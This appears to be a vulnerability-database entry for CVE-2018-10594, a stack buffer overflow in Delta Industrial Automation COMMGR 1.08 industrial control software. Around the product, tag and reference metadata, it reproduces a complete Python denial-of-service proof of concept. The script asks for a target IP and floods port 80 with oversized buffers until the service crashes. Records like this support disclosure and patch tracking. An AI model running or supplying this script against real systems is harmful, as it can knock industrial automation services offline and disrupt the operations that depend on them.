ID

VAR-E-201807-0028


CVE

cve_id:CVE-2018-10594

Trust: 2.5

sources: PACKETSTORM: 148381 // PACKETSTORM: 149741 // PACKETSTORM: 149715 // EXPLOIT-DB: 44965

EDB ID

44965


TITLE

Delta Industrial Automation COMMGR 1.08 - Stack Buffer Overflow (PoC) - Hardware dos Exploit

Trust: 0.6

sources: EXPLOIT-DB: 44965

DESCRIPTION

Delta Industrial Automation COMMGR 1.08 - Stack Buffer Overflow (PoC). CVE-2018-10594 . dos exploit for Hardware platform

Trust: 0.6

sources: EXPLOIT-DB: 44965

AFFECTED PRODUCTS

vendor:deltamodel:industrial automation commgrscope:eqversion:1.08

Trust: 2.1

vendor:deltamodel:electronics delta industrial automation commgrscope:eqversion:1.08

Trust: 0.5

vendor:deltamodel:electronics delta industrial automation commgr stackscope:eqversion:1.08

Trust: 0.5

sources: PACKETSTORM: 148381 // PACKETSTORM: 149741 // PACKETSTORM: 149715 // EXPLOIT-DB: 44965 // EDBNET: 98512

EXPLOIT

# Exploit Title: Delta Electronics Delta Industrial Automation COMMGR
- Remote STACK-BASED BUFFER OVERFLOW
# Date: 02.07.2018
# Exploit Author: t4rkd3vilz
# Vendor Homepage: http://www.deltaww.com/
# Software Link: http://www.deltaww.com/Products/PluginWebUserControl/downloadCenterCounter.aspx?DID=2093&DocPath=1&hl=en-US
# Version:
COMMGR Version 1.08 and prior.
DVPSimulator EH2, EH3, ES2, SE, SS2
AHSIM_5x0, AHSIM_5x1
# Tested on: Kali Linux
# CVE : CVE-2018-10594

#Run exploit, result DOS

import socket

ip = raw_input("[+] IP to attack: ")

sarr = []
i = 0
while True:
try:
sarr.append(socket.create_connection((ip,80)))
print "[+] Connection %d" % i
crash1 = "\x41"*4412 +"\X42"*1000
sarr[i].send(crash1+'\r\n')
i+=1
except socket.error:
print "[*] Server crashed "
raw_input()
break

Trust: 1.0

sources: EXPLOIT-DB: 44965

EXPLOIT LANGUAGE

py

Trust: 0.6

sources: EXPLOIT-DB: 44965

PRICE

free

Trust: 0.6

sources: EXPLOIT-DB: 44965

TYPE

Stack Buffer Overflow (PoC)

Trust: 1.6

sources: EXPLOIT-DB: 44965 // EDBNET: 98512

TAGS

tag:exploit

Trust: 1.5

tag:overflow

Trust: 1.5

tag:Buffer Overflow

Trust: 1.0

tag:proof of concept

Trust: 0.5

sources: PACKETSTORM: 148381 // PACKETSTORM: 149741 // PACKETSTORM: 149715 // EXPLOIT-DB: 44965

CREDITS

t4rkd3vilz

Trust: 0.6

sources: EXPLOIT-DB: 44965

EXTERNAL IDS

db:NVDid:CVE-2018-10594

Trust: 2.5

db:EXPLOIT-DBid:44965

Trust: 1.6

db:EDBNETid:98512

Trust: 0.6

db:PACKETSTORMid:148381

Trust: 0.5

db:PACKETSTORMid:149741

Trust: 0.5

db:PACKETSTORMid:149715

Trust: 0.5

sources: PACKETSTORM: 148381 // PACKETSTORM: 149741 // PACKETSTORM: 149715 // EXPLOIT-DB: 44965 // EDBNET: 98512

REFERENCES

url:https://nvd.nist.gov/vuln/detail/cve-2018-10594

Trust: 2.5

url:https://www.exploit-db.com/exploits/44965/

Trust: 0.6

sources: PACKETSTORM: 148381 // PACKETSTORM: 149741 // PACKETSTORM: 149715 // EXPLOIT-DB: 44965 // EDBNET: 98512

SOURCES

db:PACKETSTORMid:148381
db:PACKETSTORMid:149741
db:PACKETSTORMid:149715
db:EXPLOIT-DBid:44965
db:EDBNETid:98512

LAST UPDATE DATE

2022-07-27T09:21:21.342000+00:00


SOURCES RELEASE DATE

db:PACKETSTORMid:148381date:2018-07-02T16:17:06
db:PACKETSTORMid:149741date:2018-10-10T17:28:04
db:PACKETSTORMid:149715date:2018-10-08T16:17:57
db:EXPLOIT-DBid:44965date:2018-07-02T00:00:00
db:EDBNETid:98512date:2018-07-03T00:00:00